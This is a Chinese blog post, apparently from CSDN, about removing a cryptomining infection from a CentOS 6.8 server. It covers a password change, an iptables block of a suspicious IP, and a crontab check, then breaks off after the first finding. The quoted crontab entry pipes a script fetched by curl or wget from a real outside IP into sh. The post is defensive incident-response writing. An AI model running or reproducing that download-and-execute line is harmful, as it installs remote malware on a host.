centos6.8服务器中了挖矿程序病毒的解决方法

最新推荐文章于 2025-12-25 21:01:37 发布
原创 最新推荐文章于 2025-12-25 21:01:37 发布 · 1.4k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文针对阿里云安全警告中提到的异常登录与恶意挖矿程序,提供了详细的防御措施,包括修改服务器密码、封禁可疑IP及查杀病毒的具体步骤。

在收到阿里云的安全警告2条

1、异常登录-ECS在非常用地登录

2、恶意进程(云查杀)-挖矿程序

根据提示分析,当有异常登录时,基本上是服务器的密码被破解了,所以第一步是先修改服务器的密码

输入命令passwd 回车输入新的密码

第二步、查封可疑IP,根据阿里云的提示使用iptabes禁止可疑IP的连接

iptables -I INPUT -s 68.183.140.39 -j DROP

查看一下是否增加进去了

iptables -L -n -v

第三步、查杀对应的病毒,大部分的病毒无非通过crontab和常驻内存进行复制;所以我们先去查一下crontab

输入命令crontab -e看一下是否有可疑的命令,我的查找到如下的命令

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

 

PHP黄建文
关注
ESC入门(二)
小鸡不好惹的博客
11-02 435
VPC(Virtual Private Cloud)是您基于阿里云创建的自定义私有网络,不同的专有网络之间二层逻辑隔离,您可以完全掌控自己的专有网络,例如选择IP地址范围、配置路由表和网关等,可以在自己创建的专有网络内创建和管理云产品实例。提示:root用户权限是Linux系统中特定用户拥有的最高权限,它可以让用户访问和修改操作系统的核心资源,修改系统文件时不会遇到权限问题,但也不能滥用,因为这种权限可能会导致系统的破坏,因此要慎重使用root权限。是组成专有网络的基础网络设备,用来连接不同的云资源。
ECS 服务器出现了异地登录怎么办?
云大牛的博客
12-06 3346
如果出现异地登录解决办法如下: 首先确认一下在异地登录的时间点自己或者其他管理员是否有过登录操作。 如果不是用户或者合法管理员操作,可以执行以下操作: 建议立即更改用户密码,并对服务器进行检查。 排查肉鸡问题。 使用安全组功能设置只允许指定的 IP 登录,避免未授权用户连接服务器...
阿里云服务器web应用安全-异常登录
gstc110的专栏
06-19 2256
最近刚在阿里云ecs上搭了java web应用,刚上线几天,就发现每天都有root,mysql等用户的异常登录。经过查资料发现如下解决办法: 禁止指定用户远程ssh登录: 修改/etc/pam.d/sshd文件,添加如下一行代码。 然后创建/etc/sshdusers文件,添加禁止远程ssh登录的用户: 然后再用这些用户ssh登录,会发现权限不允许的错误。而
阿里云国际站:ecs提示异地登录如何查看在哪里登录的?
aliyuncloud的博客
07-25 540
对于发现可疑的登录行为,建议您及时修改账号密码,并加强账号的安全策略,如开启多因素认证、定期更新密码等,以提高账号的安全性。总结一下,ecs提示异地登录如何查看在哪里登录的?通过登录阿里云管理控制台,进入操作审计页面,根据相关信息筛选出异地登录的记录,并查看详细的登录信息,可以准确了解到底是在哪里登录的。在操作审计页面的搜索栏中,输入您的阿里云AccessKey的ID或者子用户的用户名,点击【搜索】进行查询。此外,您还可以点击具体的操作记录,查看更详细的信息,包括登录所在的IP地址、登录方式、登录时间等。
CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web
dkgee
12-13 4737
特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统的crontab –l显示调度列表如下: 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看脚本内容: #!/bin/bash exec &>/dev/null echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFU...
centos8 处理挖矿程序攻击
Wangthebest的专栏
05-30 1601
ll /usr/bin/top* top命令被修改,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装。 yum remove e2fsprogs #rpm -qa|grep e2fsprogs yum -y install e2fsprogs #yum install e2fsprogs-1.45.6-2.el8.x86_64 解锁TOP文件并恢复 chattr -i top mv top top.rm mv top.lanigiro top 4.
关于linux遭受挖矿病毒,伪装为trace
麋鹿迷了路~
01-04 2991
前几天两台线上的centos7遭遇了挖矿病毒 每天的cpu都是跑满的状态 进程名为:trace 实际文件名为:xmrig 捋一下处理流程: 看看一下进程号。然后 ls -l /proc/进程号/exe 看一下启动程序的路径 然后发现在/home下 home下有程序及启动的脚本 然后把程序及脚本取消掉执行权限 就放下了。 结果第二天他还跑起来了,之后我把文件删除,...
Centos7 处理挖矿病毒初探
wolf1105的博客
08-15 7349
1、首先查看top命令下占用cpu最高的是什么进程 #top #lsof 进程名 如果是挖矿程序可以看到明显的异常 具体lsof的用法 请参考 https://www.cnblogs.com/sparkbj/p/7161669.html 确定挖矿程序的路径以后,先kill掉进程,再删除文件 #kill -9 555 #rm -rf /tmp/wakuang.sh 2、清理定时任务 一般只...
【Linux】CentOS7.x服务器挖矿病毒排查分析处理
最新发布
michaelwoshi的博客
12-25 1554
→ 直接看高流量进程PID;→ 验证进程是否合法;kill -9 PID + 封禁IP;业务进程:限流/优化。基于 iftop流量监控,找到可疑tcp连接,从而找到可疑进程和文件结合你提供的信息(/tmp/linux是32位ELF恶意程序、持续连接乌克兰IP、进程占用高CPU/网络),以下是分层确认病毒文件内容、行为、目的确认行为:通过stracetcpdump验证/tmp/linux向乌克兰IP发送数据;分析文件:用stringsVirusTotal确认是挖矿/远控木马(重点看xmr。
挖矿病毒zz.sh——记一次linux(centos)成为矿机后的排查与修复过程
m0_37313888的博客
09-27 1万+
我们工作组的主机集群某天被发现cpu利用率600%多,显然被种了后门来挖矿。写一下这篇文章来记录排查过程中遇到的问题。 1.怎么发现变矿机? 1)top 发现cpu炸了。这个也是常见的查看方法 2) netstat -natp 发现有几个异常的tcp连接,一查ip,发现是俄罗斯,荷兰的ip,估计主机被人种后门了 2.具体流程 crontab -l ,发现果然有一分钟一次的定时任务,...
恶意进程(云查杀)-DDOS木马
weixin_43200106的博客
06-10 3720
一、 恶意文件路径:/lib/libsys 恶意文件md5:90f06c70846f5570a32bc51a194a72c0 描述:黑客在入侵系统后植入的恶意程序,会占用您的带宽攻击其他服务器,同时可能影响自身业务的正常运行,危害较大。 此类恶意程序可能还存在自删除行为,或伪装成系统程序以躲避检测。如果发现该文件不存在,请检查是否存在可疑进程、定时任务或启动项。帮助文档:https://he...
centos 处理挖矿病毒
weixin_44606690的博客
01-04 1119
处理挖矿病毒,真的恶心啊占用CPU百分之50
成功处理挖矿病毒劫持,crontab注入顽固脚本,cpu、内存飙升
yan_dk的专栏
08-30 2706
本人的linux centos服务器挖矿病毒劫持有几个月了,crontab 顽固脚本一直占用,删除也删除不了,cpu、内存一直被长期占用,真是非常痛苦。最近花了几天时间研究,终于成功处理了。cpu、内存也平稳运行了,心情轻松了很多。 有需要技术支持解决问题的朋友,可以联系我。 手机:18034263356 ...
如何检查Centos是否存在挖矿程序
u010216616的专栏
07-17 2079
4. 使用专业工具:如果想更加深入地检查 Centos 系统中的挖矿程序,可以使用一些专业工具,例如"hashwatch"和"hping3"。这些工具可以检测网络上的主机是否存在挖矿行为,并跟踪挖矿程序的活动。例如,可以使用"top"命令来查看系统中正在运行的进程,查找是否有可疑的进程。例如,可以在/etc/目录下查找任何可能与挖矿程序相关的配置文件,或者在其他系统目录中查找任何奇怪的脚本或二进制文件。但是,这种方法只能检测到直接连接到挖矿芯片的程序,而无法检测到使用代理或隐藏进程的挖矿程序
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 3048
有一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
挖矿病毒分析(centos7)
ntgengyf的博客
07-25 1395
本次服务器被入侵,被人植入了密钥文件,导致入侵者可以免密登录服务器,在redis中看到了一个很奇怪的key,它的value的意思是一个定时任务通过curl下载某个sh脚本,并执行,看到网上的一位博主,总结的很好,它总结的原因如下。比较有名的挖矿蠕虫病毒,攻击手段为通过redis感染服务器,如果redis的端口为默认的6379且暴露在公网上,且没有设置客户端连接密码认证,很容易感染,这个病毒是分级别的,好在我遇到的是比较简单的,解决方法如下。.相关的代码,查看进程发现果然多了一个redis-cli的进程。
CentOS7 服务器挖矿病毒 删除又重新生成处理
jnloverll的博客
04-30 2517
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/TankRuning/article/details/103527323 收起 特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统的crontab –l显示调度列表如下: 20 * * * * /root/.aliy...
ECS-入门-登录ECS服务器
little_startoo的博客
12-29 605
ECS-入门-登录ECS服务器
挖矿病毒解决实例(隐藏进程,文章较好)(入侵)
热门推荐
墨痕诉清风的博客
01-06 1万+
CPU起飞了 最近有朋友在群里反馈,自己服务器的CPU一直处于高占用状态,但用top、ps等命令却一直找不到是哪个进程在占用,怀疑中了挖矿病毒,急的团团转。 根据经验,我赶紧让他看一下当前服务器的网络连接,看看有没有可疑连接,果然发现了有点东西: 上Shodan查一下这IP地址: 反向查找,发现有诸多域名曾经解析到这个IP地址: 这是一个位于德国的IP地址,开放了4444,5555,7777等数个特殊的服务端口: 其中这位朋友服务器上发现的连接到的是7777端口,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值